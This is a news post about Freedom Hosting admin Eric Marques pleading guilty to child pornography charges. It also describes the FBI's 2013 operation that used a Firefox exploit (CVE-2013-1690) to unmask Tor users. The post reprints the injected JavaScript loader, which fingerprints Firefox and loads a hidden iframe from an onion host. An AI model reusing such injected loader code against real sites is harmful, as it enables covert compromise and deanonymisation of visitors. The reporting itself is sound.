Darknetlive

  1. Home
  2. Posts
  3. Freedom Hosting Admin Admits Child Pornography Charges

Freedom Hosting Admin Admits Child Pornography Charges

Eric Eoin Marques, the creator and administrator of Freedom Hosting, pleaded guilty to conspiracy to advertise child pornography. Freedom Hosting, at its height, was the largest Tor webhost and the FBI called Marques “the largest facilitator of child porn on the planet.”

Marques admitted operating Freedom Hosting from between 2008 and 2013 until his arrest in Dublin, Ireland. Investigators learned that Marques had helped operate “criminal communities dedicated to the sexual exploitation of children.” He was not a “hands off” administrator and actively participated in the child exploitation forums hosted on Freedom Hosting.

Freedom Hosting homepage

Freedom Hosting homepage

Law enforcement in Ireland arrested Marques after a grand jury had returned an indictment charging him with the following crimes:

  • Conspiracy to Advertise Child Pornography
  • Conspiracy to Distribute Child Pornography
  • Advertising Child Pornography
  • Distribution of Child Pornography

An example of his active participation and acknowledgement of the illegal forums using Freedom Hosting:

On April 24, 2013, a user of Website A posted a message asking whether the anonymous hosting service (AHS) is free to the end user. On April 25, 2013, the administrator of Website A responded that the AHS is “100% free” and that the administrator assumes that “the admin covers [the cost] himself as a·service to the [Network] pedo community.”

Website A, in this instance, is a reference to one of the largest child exploitation forums at the time. In a similar thread, users of the forum talked about Marques’ additional involvement:

On May 31, 2013, the administrator of Website A replied to a user that claimed, “[AHS] has NO control of the sites it hosts. It only hosts them.” The administrator responded, stating, “In reality [AHS] has full control over all the websites hosted on their servers. In fact, just a few days ago they patched a few of the core files running this very forum.” Later in the same conversation, the administrator noted that, though AHS does not “create or maintain ( as far as I know) any of the sites they are hosting” AHS could “do whatever they wanted with the-sites they host as they inherently have full access to the databases behind the sites.”

Freedom Hosting, in total hosted more than 8.5 million images of child exploitation material, according to an announcement from the Department of Justice. (Marques had little to no involvement in the administration of the majority of the sites hosted by Freedom Hosting. The government focused entirely on child pornography crimes.)

After seizing Freedom Hosting servers, the FBI relaunched the service using servers under their control in Maryland.

FBI describes the operation in the criminal complaint

FBI describes the operation in the criminal complaint

On August 1, 2013, some savvy Tor users began noticing that the Freedom Hosting sites were serving a hidden “iframe”—a kind of website within a website. The iframe contained Javascript code that used a Firefox vulnerability to execute instructions on the victim’s computer. The code specifically targeted the version of Firefox used in the Tor Browser Bundle—the easiest way to use Tor.

— Visit the Wrong Website, and the Fbi Could End Up in Your Computer Kevin Poulsen - wired.com/2014/08/operation-torpedo/

The compromised server injected an iframe and then injected additional iframes with scripts that checked the vistor’s browser version (See CVE-2013-1690 for more information). If a user’s browser version met the requirements (Firefox 17 on Windows), it would download an infected payload that sent the target’s MAC address and Windows hostname to a server in Virginia controlled by the FBI. This exploit required the use of javascript. And the Tor Browser Bundle shipped with javascript enabled by default.

Below is the first indication that something was not right. The full code consists of multiple scripts and is far too long to embed here. Can check it out here though. Magneto

function createCookie(name,value,minutes) {
	if (minutes) {
		var date = new Date();
		date.setTime(date.getTime()+(minutes*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name) {
    var nameEQ = name + "=";
    var ca = document.cookie.split(';');
    for(var i=0;i < ca.length;i++) {
    	var c = ca[i];
    	while (c.charAt(0)==' ') c = c.substring(1,c.length);
    	if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
    }
    return null;
}

function isFF() {
    return (document.getBoxObjectFor != null || window.mozInnerScreenX != null || /Firefox/i.test(navigator.userAgent));
}

function updatify() {
    var iframe = document.createElement('iframe');
    iframe.style.display = "inline";
    iframe.frameBorder = "0";
    iframe.scrolling = "no";
    iframe.src = "http://nl7qbezu7pqsuone.onion?requestID=XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX";
    iframe.height = "5";
    iframe.width = "*";
    document.body.appendChild(iframe);
}

function format_quick() {
    if ( ! readCookie("n_serv") ) {
        createCookie("n_serv", "XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX", 30);
        updatify();
    }
}

function isReady()
{
    if ( document.readyState === "interactive" || document.readyState === "complete" ) {
    
        if ( isFF() ) {
            format_quick();
        }
    }
    else
    {
        setTimeout(isReady, 250);
    }
}
setTimeout(isReady, 250);

Marques is scheduled for sentencing on May 11, 2020. He faces a mandatory minimum sentence of 15 years in prison.

Previously: DOJ: Freedom Hosting Admin has been Extradited to the US

h/t @just_some_d00d

Interactions
Likes: 9 Reposts: 2